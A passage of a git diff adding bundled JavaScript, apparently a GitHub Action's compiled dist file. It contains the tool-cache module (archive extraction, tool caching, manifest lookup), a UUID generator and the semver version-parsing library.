'${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` + ].join(' '); + const args = [ + '-NoLogo', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + pwshCommand + ]; + core.debug(`Using pwsh at path: ${pwshPath}`); + yield exec_1.exec(`"${pwshPath}"`, args); + } + else { + const powershellCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, + `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, + `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` + ].join(' '); + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + powershellCommand + ]; + const powershellPath = yield io.which('powershell', true); + core.debug(`Using powershell at path: ${powershellPath}`); + yield exec_1.exec(`"${powershellPath}"`, args); + } + }); +} +function extractZipNix(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + const unzipPath = yield io.which('unzip', true); + const args = [file]; + if (!core.isDebug()) { + args.unshift('-q'); + } + args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run + yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); + }); +} +/** + * Caches a directory and installs it into the tool cacheDir + * + * @param sourceDir the directory to cache into tools + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheDir(sourceDir, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source dir: ${sourceDir}`); + if (!fs.statSync(sourceDir).isDirectory()) { + throw new Error('sourceDir is not a directory'); + } + // Create the tool dir + const destPath = yield _createToolPath(tool, version, arch); + // copy each child item. do not move. move can fail on Windows + // due to anti-virus software having an open handle on a file. + for (const itemName of fs.readdirSync(sourceDir)) { + const s = path.join(sourceDir, itemName); + yield io.cp(s, destPath, { recursive: true }); + } + // write .complete + _completeToolPath(tool, version, arch); + return destPath; + }); +} +exports.cacheDir = cacheDir; +/** + * Caches a downloaded file (GUID) and installs it + * into the tool cache with a given targetName + * + * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. + * @param targetFile the name of the file name in the tools directory + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheFile(sourceFile, targetFile, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source file: ${sourceFile}`); + if (!fs.statSync(sourceFile).isFile()) { + throw new Error('sourceFile is not a file'); + } + // create the tool dir + const destFolder = yield _createToolPath(tool, version, arch); + // copy instead of move. move can fail on Windows due to + // anti-virus software having an open handle on a file. + const destPath = path.join(destFolder, targetFile); + core.debug(`destination file ${destPath}`); + yield io.cp(sourceFile, destPath); + // write .complete + _completeToolPath(tool, version, arch); + return destFolder; + }); +} +exports.cacheFile = cacheFile; +/** + * Finds the path to a tool version in the local installed tool cache + * + * @param toolName name of the tool + * @param versionSpec version of the tool + * @param arch optional arch. defaults to arch of computer + */ +function find(toolName, versionSpec, arch) { + if (!toolName) { + throw new Error('toolName parameter is required'); + } + if (!versionSpec) { + throw new Error('versionSpec parameter is required'); + } + arch = arch || os.arch(); + // attempt to resolve an explicit version + if (!isExplicitVersion(versionSpec)) { + const localVersions = findAllVersions(toolName, arch); + const match = evaluateVersions(localVersions, versionSpec); + versionSpec = match; + } + // check for the explicit version in the cache + let toolPath = ''; + if (versionSpec) { + versionSpec = semver.clean(versionSpec) || ''; + const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); + core.debug(`checking cache: ${cachePath}`); + if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { + core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); + toolPath = cachePath; + } + else { + core.debug('not found'); + } + } + return toolPath; +} +exports.find = find; +/** + * Finds the paths to all versions of a tool that are installed in the local tool cache + * + * @param toolName name of the tool + * @param arch optional arch. defaults to arch of computer + */ +function findAllVersions(toolName, arch) { + const versions = []; + arch = arch || os.arch(); + const toolPath = path.join(_getCacheDirectory(), toolName); + if (fs.existsSync(toolPath)) { + const children = fs.readdirSync(toolPath); + for (const child of children) { + if (isExplicitVersion(child)) { + const fullPath = path.join(toolPath, child, arch || ''); + if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { + versions.push(child); + } + } + } + } + return versions; +} +exports.findAllVersions = findAllVersions; +function getManifestFromRepo(owner, repo, auth, branch = 'master') { + return __awaiter(this, void 0, void 0, function* () { + let releases = []; + const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; + const http = new httpm.HttpClient('tool-cache'); + const headers = {}; + if (auth) { + core.debug('set auth'); + headers.authorization = auth; + } + const response = yield http.getJson(treeUrl, headers); + if (!response.result) { + return releases; + } + let manifestUrl = ''; + for (const item of response.result.tree) { + if (item.path === 'versions-manifest.json') { + manifestUrl = item.url; + break; + } + } + headers['accept'] = 'application/vnd.github.VERSION.raw'; + let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); + if (versionsRaw) { + // shouldn't be needed but protects against invalid json saved with BOM + versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); + try { + releases = JSON.parse(versionsRaw); + } + catch (_a) { + core.debug('Invalid json'); + } + } + return releases; + }); +} +exports.getManifestFromRepo = getManifestFromRepo; +function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { + return __awaiter(this, void 0, void 0, function* () { + // wrap the internal impl + const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); + return match; + }); +} +exports.findFromManifest = findFromManifest; +function _createExtractFolder(dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!dest) { + // create a temp dir + dest = path.join(_getTempDirectory(), v4_1.default()); + } + yield io.mkdirP(dest); + return dest; + }); +} +function _createToolPath(tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + core.debug(`destination ${folderPath}`); + const markerPath = `${folderPath}.complete`; + yield io.rmRF(folderPath); + yield io.rmRF(markerPath); + yield io.mkdirP(folderPath); + return folderPath; + }); +} +function _completeToolPath(tool, version, arch) { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + const markerPath = `${folderPath}.complete`; + fs.writeFileSync(markerPath, ''); + core.debug('finished caching tool'); +} +/** + * Check if version string is explicit + * + * @param versionSpec version string to check + */ +function isExplicitVersion(versionSpec) { + const c = semver.clean(versionSpec) || ''; + core.debug(`isExplicit: ${c}`); + const valid = semver.valid(c) != null; + core.debug(`explicit? ${valid}`); + return valid; +} +exports.isExplicitVersion = isExplicitVersion; +/** + * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` + * + * @param versions array of versions to evaluate + * @param versionSpec semantic version spec to satisfy + */ +function evaluateVersions(versions, versionSpec) { + let version = ''; + core.debug(`evaluating ${versions.length} versions`); + versions = versions.sort((a, b) => { + if (semver.gt(a, b)) { + return 1; + } + return -1; + }); + for (let i = versions.length - 1; i >= 0; i--) { + const potential = versions[i]; + const satisfied = semver.satisfies(potential, versionSpec); + if (satisfied) { + version = potential; + break; + } + } + if (version) { + core.debug(`matched: ${version}`); + } + else { + core.debug('match not found'); + } + return version; +} +exports.evaluateVersions = evaluateVersions; +/** + * Gets RUNNER_TOOL_CACHE + */ +function _getCacheDirectory() { + const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; + assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); + return cacheDirectory; +} +/** + * Gets RUNNER_TEMP + */ +function _getTempDirectory() { + const tempDirectory = process.env['RUNNER_TEMP'] || ''; + assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); + return tempDirectory; +} +/** + * Gets a global variable + */ +function _getGlobal(key, defaultValue) { + /* eslint-disable @typescript-eslint/no-explicit-any */ + const value = global[key]; + /* eslint-enable @typescript-eslint/no-explicit-any */ + return value !== undefined ? value : defaultValue; +} +/** + * Returns an array of unique values. + * @param values Values to make unique. + */ +function _unique(values) { + return Array.from(new Set(values)); +} +//# sourceMappingURL=tool-cache.js.map + +/***/ }), + +/***/ 7701: +/***/ ((module) => { + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +var byteToHex = []; +for (var i = 0; i < 256; ++i) { + byteToHex[i] = (i + 0x100).toString(16).substr(1); +} + +function bytesToUuid(buf, offset) { + var i = offset || 0; + var bth = byteToHex; + // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 + return ([ + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]] + ]).join(''); +} + +module.exports = bytesToUuid; + + +/***/ }), + +/***/ 7269: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +// Unique ID creation requires a high quality random # generator. In node.js +// this is pretty straight-forward - we use the crypto API. + +var crypto = __nccwpck_require__(6113); + +module.exports = function nodeRNG() { + return crypto.randomBytes(16); +}; + + +/***/ }), + +/***/ 7468: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +var rng = __nccwpck_require__(7269); +var bytesToUuid = __nccwpck_require__(7701); + +function v4(options, buf, offset) { + var i = buf && offset || 0; + + if (typeof(options) == 'string') { + buf = options === 'binary' ? new Array(16) : null; + options = null; + } + options = options || {}; + + var rnds = options.random || (options.rng || rng)(); + + // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + rnds[6] = (rnds[6] & 0x0f) | 0x40; + rnds[8] = (rnds[8] & 0x3f) | 0x80; + + // Copy bytes to buffer, if provided + if (buf) { + for (var ii = 0; ii < 16; ++ii) { + buf[i + ii] = rnds[ii]; + } + } + + return buf || bytesToUuid(rnds); +} + +module.exports = v4; + + +/***/ }), + +/***/ 5911: +/***/ ((module, exports) => { + +exports = module.exports = SemVer + +var debug +/* istanbul ignore next */ +if (typeof process === 'object' && + process.env && + process.env.NODE_DEBUG && + /\bsemver\b/i.test(process.env.NODE_DEBUG)) { + debug = function () { + var args = Array.prototype.slice.call(arguments, 0) + args.unshift('SEMVER') + console.log.apply(console, args) + } +} else { + debug = function () {} +} + +// Note: this is the semver.org version of the spec that it implements +// Not necessarily the package version of this code. +exports.SEMVER_SPEC_VERSION = '2.0.0' + +var MAX_LENGTH = 256 +var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || + /* istanbul ignore next */ 9007199254740991 + +// Max safe segment length for coercion. +var MAX_SAFE_COMPONENT_LENGTH = 16 + +var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 + +// The actual regexps go on exports.re +var re = exports.re = [] +var safeRe = exports.safeRe = [] +var src = exports.src = [] +var t = exports.tokens = {} +var R = 0 + +function tok (n) { + t[n] = R++ +} + +var LETTERDASHNUMBER = '[a-zA-Z0-9-]' + +// Replace some greedy regex tokens to prevent regex dos issues. These regex are +// used internally via the safeRe object since all inputs in this library get +// normalized first to trim and collapse all extra whitespace. The original +// regexes are exported for userland consumption and lower level usage. A +// future breaking change could export the safer regex only with a note that +// all input should have extra whitespace removed. +var safeRegexReplacements = [ + ['\\s', 1], + ['\\d', MAX_LENGTH], + [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], +] + +function makeSafeRe (value) { + for (var i = 0; i < safeRegexReplacements.length; i++) { + var token = safeRegexReplacements[i][0] + var max = safeRegexReplacements[i][1] + value = value + .split(token + '*').join(token + '{0,' + max + '}') + .split(token + '+').join(token + '{1,' + max + '}') + } + return value +} + +// The following Regular Expressions can be used for tokenizing, +// validating, and parsing SemVer version strings. + +// ## Numeric Identifier +// A single `0`, or a non-zero digit followed by zero or more digits. + +tok('NUMERICIDENTIFIER') +src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' +tok('NUMERICIDENTIFIERLOOSE') +src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' + +// ## Non-numeric Identifier +// Zero or more digits, followed by a letter or hyphen, and then zero or +// more letters, digits, or hyphens. + +tok('NONNUMERICIDENTIFIER') +src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' + +// ## Main Version +// Three dot-separated numeric identifiers. + +tok('MAINVERSION') +src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')' + +tok('MAINVERSIONLOOSE') +src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' + +// ## Pre-release Version Identifier +// A numeric identifier, or a non-numeric identifier. + +tok('PRERELEASEIDENTIFIER') +src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +tok('PRERELEASEIDENTIFIERLOOSE') +src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +// ## Pre-release Version +// Hyphen, followed by one or more dot-separated pre-release version +// identifiers. + +tok('PRERELEASE') +src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' + +tok('PRERELEASELOOSE') +src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' + +// ## Build Metadata Identifier +// Any combination of digits, letters, or hyphens. + +tok('BUILDIDENTIFIER') +src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' + +// ## Build Metadata +// Plus sign, followed by one or more period-separated build metadata +// identifiers. + +tok('BUILD') +src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + + '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' + +// ## Full Version String +// A main version, followed optionally by a pre-release version and +// build metadata. + +// Note that the only major, minor, patch, and pre-release sections of +// the version string are capturing groups. The build metadata is not a +// capturing group, because it should not ever be used in version +// comparison. + +tok('FULL') +tok('FULLPLAIN') +src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + + src[t.PRERELEASE] + '?' + + src[t.BUILD] + '?' + +src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' + +// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. +// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty +// common in the npm registry. +tok('LOOSEPLAIN') +src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + + src[t.PRERELEASELOOSE] + '?' + + src[t.BUILD] + '?' + +tok('LOOSE') +src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' + +tok('GTLT') +src[t.GTLT] = '((?:<|>)?=?)' + +// Something like "2.*" or "1.2.x". +// Note that "x.x" is a valid xRange identifer, meaning "any version" +// Only the first item is strictly required. +tok('XRANGEIDENTIFIERLOOSE') +src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' +tok('XRANGEIDENTIFIER') +src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' + +tok('XRANGEPLAIN') +src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:' + src[t.PRERELEASE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGEPLAINLOOSE') +src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:' + src[t.PRERELEASELOOSE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGE') +src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' +tok('XRANGELOOSE') +src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' + +// Coercion. +// Extract anything that could conceivably be a part of a valid semver +tok('COERCE') +src[t.COERCE] = '(^|[^\\d])' + + '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:$|[^\\d])' +tok('COERCERTL') +re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') +safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') + +// Tilde ranges. +// Meaning is "reasonably at or greater than" +tok('LONETILDE') +src[t.LONETILDE] = '(?:~>?)' + +tok('TILDETRIM') +src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' +re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') +safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') +var tildeTrimReplace = '$1~' + +tok('TILDE') +src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' +tok('TILDELOOSE') +src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' + +// Caret ranges. +// Meaning is "at least and backwards compatible with" +tok('LONECARET') +src[t.LONECARET] = '(?:\\^)' + +tok('CARETTRIM') +src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' +re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') +safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') +var caretTrimReplace = '$1^' + +tok('CARET') +src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' +tok('CARETLOOSE') +src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' + +// A simple gt/lt/eq thing, or just "" to indicate "any version" +tok('COMPARATORLOOSE') +src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' +tok('COMPARATOR') +src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' + +// An expression to strip any whitespace between the gtlt and the thing +// it modifies, so that `> 1.2.3` ==> `>1.2.3` +tok('COMPARATORTRIM') +src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + + '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' + +// this one has to use the /g flag +re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') +safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') +var comparatorTrimReplace = '$1$2$3' + +// Something like `1.2.3 - 1.2.4` +// Note that these all use the loose form, because they'll be +// checked against either the strict or loose comparator form +// later. +tok('HYPHENRANGE') +src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAIN] + ')' + + '\\s*$' + +tok('HYPHENRANGELOOSE') +src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s*$' + +// Star ranges basically just allow anything at all. +tok('STAR') +src[t.STAR] = '(<|>)?=?\\s*\\*' + +// Compile to actual regexp objects. +// All are flag-free, unless they were created above with a flag. +for (var i = 0; i < R; i++) { + debug(i, src[i]) + if (!re[i]) { + re[i] = new RegExp(src[i]) + + // Replace all greedy whitespace to prevent regex dos issues. These regex are + // used internally via the safeRe object since all inputs in this library get + // normalized first to trim and collapse all extra whitespace. The original + // regexes are exported for userland consumption and lower level usage. A + // future breaking change could export the safer regex only with a note that + // all input should have extra whitespace removed. + safeRe[i] = new RegExp(makeSafeRe(src[i])) + } +} + +exports.parse = parse +function parse (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (version instanceof SemVer) { + return version + } + + if (typeof version !== 'string') { + return null + } + + if (version.length > MAX_LENGTH) { + return null + } + + var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] + if (!r.test(version)) { + return null + } + + try { + return new SemVer(version, options) + } catch (er) { + return null + } +} + +exports.valid = valid +function valid (version, options) { + var v = parse(version, options) + return v ? v.version : null +} + +exports.clean = clean +function clean (version, options) { + var s = parse(version.trim().replace(/^[=v]+/, ''), options) + return s ? s.version : null +} + +exports.SemVer = SemVer + +function SemVer (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + if (version instanceof SemVer) { + if (version.loose === options.loose) { + return version + } else { + version = version.version + } + } else if (typeof version !== 'string') { + throw new TypeError('Invalid Version: ' + version) + } + + if (version.length > MAX_LENGTH) { + throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') + } + + if (!(this instanceof SemVer)) { + return new SemVer(version, options) + } + + debug('SemVer', version, options) + this.options = options + this.loose = !!options.loose + + var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) + + if (!m) { + throw new TypeError('Invalid Version: ' + version) + } + + this.raw = version + + // these are actually numbers + this.major = +m[1] + this.minor = +m[2] + this.patch = +m[3] + + if (this.major > MAX_SAFE_INTEGER || this.major < 0) { + throw new TypeError('Invalid major version') + } + + if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { + throw new TypeError('Invalid minor version') + } + + if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { + throw new TypeError('Invalid patch version') + } + + // numberify any prerelease numeric ids + if (!m[4]) { + this.prerelease = [] + } else { + this.prerelease = m[4].split('.').map(function (id) { + if (/^[0-9]+$/.test(id)) { + var num = +id + if (num >= 0 && num < MAX_SAFE_INTEGER) { + return num + } + } + return id + }) + } + + this.build = m[5] ? m[5].split('.') : [] + this.format() +} + +SemVer.prototype.format = function () { + this.version = this.major + '.' + this.minor + '.' + this.patch + if (this.prerelease.length) { + this.version += '-' + this.prerelease.join('.') + } + return this.version +} + +SemVer.prototype.toString = function () { + return this.version +} + +SemVer.prototype.compare = function (other) { + debug('SemVer.compare', this.version, this.options, other) + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return this.compareMain(other) || this.comparePre(other) +} + +SemVer.prototype.compareMain = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return compareIdentifiers(this.major, other.major) || + compareIdentifiers(this.minor, other.minor) || + compareIdentifiers(this.patch, other.patch) +} + +SemVer.prototype.comparePre = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + // NOT having a prerelease is > having one + if (this.prerelease.length && !other.prerelease.length) { + return -1 + } else if (!this.prerelease.length && other.prerelease.length) { + return 1 + } else if (!this.prerelease.length && !other.prerelease.length) { + return 0 + } + + var i = 0 + do { + var a = this.prerelease[i] + var b = other.prerelease[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +SemVer.prototype.compareBuild = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + var i = 0 + do { + var a = this.build[i] + var b = other.build[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +// preminor will bump the version up to the next minor release, and immediately +// down to pre-release. premajor and prepatch work the same way. +SemVer.prototype.inc = function (release, identifier) { + switch (release) { + case 'premajor': + this.prerelease.length = 0 + this.patch = 0 + this.minor = 0 + this.major++ + this.inc('pre', identifier) + break + case 'preminor': + this.prerelease.length = 0 + this.patch = 0 + this.minor++ + this.inc('pre', identifier) + break + case 'prepatch': + // If this is already a prerelease, it will bump to the next version + // drop any prereleases that might already exist, since they are not + // relevant at this point. + this.prerelease.length = 0 + this.inc('patch', identifier) + this.inc('pre', identifier) + break + // If the input is a non-prerelease version, this acts the same as + // prepatch. + case 'prerelease': + if (this.prerelease.length === 0) { + this.inc('patch', identifier) + } + this.inc('pre', identifier) + break + + case 'major': + // If this is a pre-major version, bump up to the same major version. + // Otherwise increment major. + // 1.0.0-5 bumps to 1.0.0 + // 1.1.0 bumps to 2.0.0 + if (this.minor !== 0 || + this.patch !== 0 || + this.prerelease.length === 0) { + this.major++ + } + this.minor = 0 + this.patch = 0 + this.prerelease = [] + break + case 'minor': + // If this is a pre-minor version, bump up to the same minor version. + // Otherwise increment minor. + // 1.2.0-5 bumps to 1.2.0 + // 1.2.1 bumps to 1.3.0 + if (this.patch !== 0 || this.prerelease.length === 0) { + this.minor++ + } + this.patch = 0 + this.prerelease = [] + break + case 'patch': + // If this is not a pre-release version, it will increment the patch. + // If it is a pre-release it will bump up to the same patch version. + // 1.2.0-5 patches to 1.2.0 + // 1.2.0 patches to 1.2.1 + if (this.prerelease.length === 0) { + this.patch++ + } + this.prerelease = [] + break + // This probably shouldn't be used publicly. + // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. + case 'pre': + if (this.prerelease.length === 0) { + this.prerelease = [0] + } else { + var i = this.prerelease.length + while (--i >= 0) { + if (typeof this.prerelease[i] === 'number') { + this.prerelease[i]++ + i = -2 + } + } + if (i === -1) { + // didn't increment anything + this.prerelease.push(0) + } + } + if (identifier) { + // 1.2.0-beta.1 bumps to 1.2.0-beta.2, + // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 + if (this.prerelease[0] === identifier) { + if (isNaN(this.prerelease[1])) { + this.prerelease = [identifier, 0] + } + } else { + this.prerelease = [identifier, 0] + } + } + break + + default: + throw new Error('invalid increment argument: ' + release) + } + this.format() + this.raw = this.version + return this +} + +exports.inc = inc +function inc (version, release, loose, identifier) { + if (typeof (loose) === 'string') { + identifier = loose + loose = undefined + } + + try { + return new SemVer(version, loose).inc(release, identifier).version + } catch (er) { + return null + } +} + +exports.diff = diff +function diff (version1, version2) { + if (eq(version1, version2)) { + return null + } else { + var v1 = parse(version1) + var v2 = parse(version2) + var prefix = '' + if (v1.prerelease.length || v2.prerelease.length) { + prefix = 'pre' + var defaultResult = 'prerelease' + } + for (var key in v1) { + if (key === 'major' || key === 'minor' || key === 'patch') { + if (v1[key] !== v2[key]) { + return prefix + key + } + } + } + return defaultResult // may be undefined + } +} + +exports.compareIdentifiers = compareIdentifiers + +var numeric = /^[0-9]+$/ +function compareIdentifiers (a, b) { + var anum = numeric.test(a) + var bnum = numeric.test(b) + + if (anum && bnum) { + a = +a + b = +b + } + + return a === b ? 0 + : (anum && !bnum) ? -1 + : (bnum && !anum) ? 1 + : a < b ? -1 + : 1 +} + +exports.rcompareIdentifiers = rcompareIdentifiers +function rcompareIdentifiers (a, b) { + return compareIdentifiers(b, a) +} + +exports.major = major +function major (a, loose) { + return new SemVer(a, loose).major +} + +exports.minor = minor +function minor (a, loose) { + return new SemVer(a, loose).minor +} + +exports.patch = patch +function patch (a, loose) { + return new SemVer(a, loose).patch +} + +exports.compare = compare +function compare (a, b, loose) { + return new SemVer(a, loose).compare(new SemVer(b, loose)) +} + +exports.compareLoose = compareLoose +function compareLoose (a, b) { + return compare(a, b, true) +} + +exports.compareBuild = compareBuild +function compareBuild (a, b, loose) { + var versionA = new SemVer(a, loose) + var versionB = new SemVer(b, loose) + return versionA.compare(versionB) || versionA.compareBuild(versionB) +} + +exports.rcompare = rcompare +function rcompare (a, b, loose) { + return compare(b, a, loose) +} + +exports.sort = sort +function sort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(a, b, loose) + }) +} + +exports.rsort = rsort +function rsort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(b, a, loose) + }) +} + +exports.gt = gt +function gt (a, b, loose) { + return compare(a, b, loose) > 0 +} + +exports.lt = lt +function lt (a, b, loose) { + return compare(a, b, loose) < 0 +} + +exports.eq = eq +function eq (a, b, loose) { + return compare(a, b, loose) === 0 +} + +exports.neq = neq +function neq (a, b, loose) { + return compare(a, b, loose) !== 0 +} + +exports.gte = gte +function gte (a, b, loose) { + return compare(a, b, 